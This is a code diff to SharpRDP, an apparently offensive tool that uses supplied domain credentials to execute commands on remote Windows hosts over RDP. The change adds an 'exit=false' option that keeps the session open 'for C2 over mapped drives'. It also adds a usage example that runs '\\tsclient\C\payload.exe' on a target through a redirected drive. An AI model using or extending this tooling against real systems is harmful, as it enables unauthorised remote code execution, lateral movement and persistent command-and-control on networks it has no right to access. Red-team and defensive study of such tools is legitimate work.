diff --git a/SharpRDP/SharpRDP/Client.cs b/SharpRDP/SharpRDP/Client.cs index 4edd918..0ca4fd5 100644 --- a/SharpRDP/SharpRDP/Client.cs +++ b/SharpRDP/SharpRDP/Client.cs @@ -22,6 +22,7 @@ public class Client private string target; private string runtype; private bool isdrive; + private bool exitend; private bool takeover; private bool networkauth; private enum LogonErrors : uint @@ -92,12 +93,13 @@ private enum DisconnectReasons : uint SSL_ERR_SMARTCARD_WRONG_PIN = 0x1C07 } - public void CreateRdpConnection(string server, string user, string domain, string password, string command, string execw, string runelevated, bool condrive, bool tover, bool nla) + public void CreateRdpConnection(string server, string user, string domain, string password, string command, string execw, string runelevated, bool condrive, bool xitend, bool tover, bool nla) { keycode = new Dictionary(); KeyCodes(); runtype = runelevated; isdrive = condrive; + exitend = xitend; cmd = command; target = server; execwith = execw; @@ -127,7 +129,7 @@ void ProcessTaskThread() rdpConnection.UserName = user; rdpConnection.AdvancedSettings9.allowBackgroundInput = 1; rdpConnection.AdvancedSettings9.BitmapPersistence = 0; - if(condrive == true) + if (condrive == true) { rdpConnection.AdvancedSettings5.RedirectDrives = true; } @@ -238,12 +240,25 @@ private void RdpConnectionOnOnLoginComplete(object sender, EventArgs e) { RunRun(); } - Thread.Sleep(1000); - Console.WriteLine("[+] Disconnecting from : {0}", target); - rdpSession.Disconnect(); + + if (exitend) + { + Console.WriteLine("[+] Disconnecting from : {0}", target); + rdpSession.Disconnect(); + } + else + { + Console.WriteLine("[+] Keeping session alive for C2 over mapped drives : {0}", target); + Console.WriteLine("[+] Ctrl+c or kill process to end", target); + + // ignore all input and keep the session alive + Console.ReadKey(); + } } + + private void RdpConnectionOnOnDisconnected(object sender, IMsTscAxEvents_OnDisconnectedEvent e) { DisconnectCode = e.discReason; diff --git a/SharpRDP/SharpRDP/Program.cs b/SharpRDP/SharpRDP/Program.cs index b54add2..78f2f71 100644 --- a/SharpRDP/SharpRDP/Program.cs +++ b/SharpRDP/SharpRDP/Program.cs @@ -28,6 +28,8 @@ static void HowTo() Console.WriteLine(" SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user password=password elevated=winr"); Console.WriteLine(" Execute command elevated through task manager"); Console.WriteLine(" SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user password=password elevated=taskmgr"); + Console.WriteLine(" Execute payload through shared drive and keep connection active for C2"); + Console.WriteLine(" SharpRDP.exe computername=domain.target command=\"\\\\tsclient\\C\\payload.exe\" username=domain\\user password=password connectdrive=true exit=false"); } static void Main(string[] args) { @@ -60,6 +62,7 @@ static void Main(string[] args) string execElevated = string.Empty; string execw = ""; bool connectdrive = false; + bool exitend = true; bool takeover = false; bool nla = false; @@ -129,6 +132,13 @@ static void Main(string[] args) connectdrive = true; } } + if (arguments.ContainsKey("exit")) + { + if (arguments["exit"].ToLower() == "false") + { + exitend = false; + } + } if (arguments.ContainsKey("takeover")) { if (arguments["takeover"].ToLower() == "true") @@ -146,7 +156,7 @@ static void Main(string[] args) string[] computerNames = arguments["computername"].Split(','); foreach (string server in computerNames) { - rdpconn.CreateRdpConnection(server, username, domain, password, command, execw, execElevated, connectdrive, takeover, nla); + rdpconn.CreateRdpConnection(server, username, domain, password, command, execw, execElevated, connectdrive, exitend, takeover, nla); } } else